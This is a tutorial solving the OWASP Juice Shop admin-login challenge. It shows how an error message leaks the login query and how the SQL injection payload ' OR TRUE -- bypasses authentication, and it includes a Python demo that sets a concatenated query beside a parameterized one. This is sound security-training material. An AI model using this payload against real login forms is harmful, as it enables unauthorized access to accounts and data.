OWASP Juice Shop — Login Admin Challenge Solution

Solving OWASP Juice Shop challenge with SQL injection

What is OWASP Juice Shop?

OWASP Juice Shop is a deliberately vulnerable web application for security risk awareness and training. It is an open-source project written in Node.js, Express, and Angular.

In this tutorial, I am going to demonstrate how to solve a challenge in OWASP Juice Shop using a basic SQL injection.

Before getting into that, let's look at what SQL injection is.

SQL injection is a common vulnerability in which an attacker injects SQL syntax into a query that the server builds from client input. When the server concatenates the client's input directly into the query text instead of passing it as a parameter, the attacker can change the structure of the query and expose, modify, or destroy data in the database.

Juice Shop does not properly validate or parameterize user input in its login form, so it is open to SQL injection.

How to set up OWASP Juice Shop locally

1. Get the Docker image for Juice Shop

~$ docker pull bkimminich/juice-shop:v8.7.3

2. Start the Juice Shop Docker container

~$ docker run --rm -p 3000:3000 bkimminich/juice-shop:v8.7.3

Now you can access Juice Shop at localhost:3000

Login Admin Challenge

The OWASP Juice Shop login fields are vulnerable to SQL injection, which enables unauthorized access to the system.

Let us inject SQL into the login field to bypass the login and sign in as the first user in the database.

First, provoke an error by entering a single quote (') in the email field and any string (here I used 111) in the password field.

Check the Response in the browser Network tab. You can see the SQL query used in the login.

"SELECT * FROM Users WHERE email = ''' AND password = '698d51a19d8a121ce581499d7b701668' AND deletedAt IS NULL"

Here we used ' in the email input field to cause an SQL syntax error; the error response reveals the full query, including the MD5 hash of the password we typed.

Now we know the SQL query related to logging in. We can send ' OR TRUE -- as email input and any string as a password.

"SELECT * FROM Users WHERE email = '' OR TRUE -- AND password = '698d51a19d8a121ce581499d7b701668' AND deletedAt IS NULL"

Here:

1. The ' character closes the email string.
2. OR is the SQL logical operator.
3. TRUE is a boolean value.
4. -- comments out the rest of the query after TRUE, so the password and deletedAt conditions are never evaluated.

So the WHERE clause now reads email = '' OR TRUE, which is always true, and the query returns every user in the table.
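The following added example (my own code, not Juice Shop's) reproduces the login query from above against a constructed in-memory SQLite table, so you can see why string concatenation lets the payload rewrite the query while a parameterized query treats the same input as plain data. The table, account names and passwords are constructed for the demonstration.

```python
import hashlib
import sqlite3


def md5_hex(text: str) -> str:
    """Juice Shop stores MD5 hashes of passwords; md5('111') is the hash shown in the error above."""
    return hashlib.md5(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the Users table: the admin is the first row, as in Juice Shop."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, deletedAt TEXT)")
    conn.executemany(
        "INSERT INTO Users (email, password, deletedAt) VALUES (?, ?, NULL)",
        [("admin@example.test", md5_hex("admin-pass")),   # constructed sample account
         ("user@example.test", md5_hex("user-pass"))],    # constructed sample account
    )
    return conn


def login_unsafe(conn, email: str, password: str):
    """Vulnerable: input is concatenated into the SQL text, the pattern the error message revealed."""
    sql = ("SELECT * FROM Users WHERE email = '" + email + "' AND password = '"
           + md5_hex(password) + "' AND deletedAt IS NULL")
    return conn.execute(sql).fetchone()


def login_safe(conn, email: str, password: str):
    """Hardened: placeholders bind the input as data, so quotes and -- are never parsed as SQL."""
    sql = "SELECT * FROM Users WHERE email = ? AND password = ? AND deletedAt IS NULL"
    return conn.execute(sql, (email, md5_hex(password))).fetchone()


def run_case(login_fn, conn, email: str, password: str):
    """Return the matched account's email, None for no match, or the SQL error text."""
    try:
        row = login_fn(conn, email, password)
    except sqlite3.OperationalError as exc:
        return f"SQL error: {exc}"
    return row[1] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in ["'", "' OR TRUE --", "user@example.test"]:
        print(repr(payload), "unsafe:", run_case(login_unsafe, db, payload, "111"),
              "| safe:", run_case(login_safe, db, payload, "111"))
```

The unsafe version errors on the lone quote and returns the first row (the admin) for the OR TRUE payload, while the safe version returns no match for both.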

Which user did you log in as?

This SQL injection logs us in as the first user in the database.

You can easily find the logged-in user's details by checking the response in the browser Network tab.

(Screenshot: logged-in user details)

Now we are logged in as Admin!!!

You can find my new tutorial on how to access and in OWASP Juice Shop here.

Written by Anusha Ihalapathirana, Software Engineer
